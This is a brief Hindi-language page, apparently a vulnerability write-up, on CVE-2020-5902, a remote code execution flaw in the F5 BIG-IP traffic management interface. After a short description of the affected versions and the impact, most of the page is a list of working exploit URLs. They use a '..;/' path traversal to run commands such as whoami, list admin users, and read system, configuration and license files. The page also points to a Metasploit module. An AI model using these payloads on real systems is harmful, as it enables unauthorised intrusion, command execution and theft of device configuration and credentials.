
[CVE-2020-5902] F5 BIG-IP रिमोट कोड निष्पादन (RCE)
[CVE-2020-5902] F5 BIG-IP ट्रैफ़िक प्रबंधन उपयोगकर्ता इंटरफ़ेस (TMUI) रिमोट कोड निष्पादन
BIG-IP संस्करणों 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, और 11.6.1-11.6.5.1 में, ट्रैफ़िक प्रबंधन उपयोगकर्ता इंटरफ़ेस (TMUI), जिसे कॉन्फ़िगरेशन उपयोगिता भी कहा जाता है, में अज्ञात पृष्ठों में एक रिमोट कोड निष्पादन (RCE) भेद्यता है।
यह भेद्यता अप्रमाणित हमलावरों, या प्रमाणित उपयोगकर्ताओं, जिनके पास BIG-IP प्रबंधन पोर्ट और/या स्वयं IP के माध्यम से कॉन्फ़िगरेशन उपयोगिता तक नेटवर्क पहुंच है, को मनमाने सिस्टम कमांड निष्पादित करने, फ़ाइलें बनाने या हटाने, सेवाओं को अक्षम करने, और/या मनमाना Java कोड निष्पादित करने की अनुमति देती है। यह भेद्यता पूर्ण सिस्टम समझौता कर सकती है। Appliance मोड में BIG-IP सिस्टम भी असुरक्षित है। यह समस्या डेटा प्लेन पर उजागर नहीं होती है; केवल कंट्रोल प्लेन प्रभावित होता है।
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/
मूल सुरक्षा सलाहकार F5 द्वारा प्रकाशित किया गया है और आप इसे यहाँ से प्राप्त कर सकते हैं
इसके अलावा, CVE-2020-5902 के लिए उत्कृष्ट रैंकिंग के साथ एक metasploit मॉड्यूल उपलब्ध है। आप exploits/linux/http/f5_bigip_tmui_rce.rb के लिए metasploit मॉड्यूल के ruby कोड पा सकते हैं।